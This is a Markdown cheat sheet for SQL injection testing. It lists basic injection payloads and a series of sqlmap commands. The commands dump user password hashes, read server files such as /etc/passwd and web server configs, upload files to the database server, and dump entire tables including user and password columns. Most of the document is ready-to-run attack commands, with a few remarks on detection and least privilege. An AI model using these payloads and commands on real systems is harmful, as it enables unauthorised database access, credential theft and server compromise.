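# Simple SQL Injection Payloads for Testing

```http
test' OR 1=1 --
test' UNION SELECT NULL,NULL--
```

---

# Enumeration with `sqlmap`

## HTTP GET Requests

```bash
sqlmap -u 'http://www.example.com/' --data 'uid=1&name=test' --batch
```

- Note: `--data` places the parameters in the request body, so sqlmap sends this request as a POST; for a GET request the parameters belong in the URL query string.
- Once we know which parameter is injectable, we can mark it with `*` so that sqlmap tests only that injection point, which is more efficient.

```bash
sqlmap -u 'http://www.example.com/' --data 'uid=1*&name=test' --batch
```

## HTTP POST Requests

- Copy the POST request to a file using `burp` or the Mozilla dev tools.

```bash
sqlmap -r request.txt --batch
```

## Enumerate current db and user info

- `--technique=BEU` restricts testing to Boolean-based blind, Error-based and UNION query techniques.
- `--risk=3` adds OR-based tests, which can modify data when the injection point sits in an `UPDATE` or `DELETE` statement; `--level=5` sends far more requests and also tests HTTP headers and cookies; `--batch` accepts every default answer without prompting.
- By default sqlmap identifies itself by name in the `User-Agent` header, and a level-5 run produces a high request volume, so this activity is visible in web server and WAF logs.

```bash
sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --privileges --current-db --is-dba --banner --batch
sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --users --passwords
```

## Attempt to read critical files

- On MySQL, file reads and writes succeed only if the database account holds the `FILE` privilege and `secure_file_priv` allows the path, so a least-privilege application account blocks both.

```bash
sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --file-read=/etc/passwd --batch #output may be in HEX
sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --file-read=/etc/apache2/apache2.conf --batch #Debian installs
sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --file-read=/etc/nginx/nginx.conf --batch
sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --file-read=/etc/nginx/sites-enabled/default --batch
```

## Attempt to write files

- `--file-write` takes the local file to upload and `--file-dest` takes the absolute path on the database server's file system.

```bash
sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --file-write=/local/path --file-dest=/remote/path --batch
```

## Enumerate dbs & schema

```bash
sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --dbs --schema --batch
```

## Enumerate tables & columns

```bash
sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 -D TARGET-DB --tables --batch
sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 -D TARGET-DB -T TARGET_TABLE --columns --batch
```

## Dump tables

```bash
sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 -D TARGET-DB -T TARGET_TABLE --dump --batch
sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 -D TARGET-DB -T TARGET_TABLE -C user,password --dump --batch
```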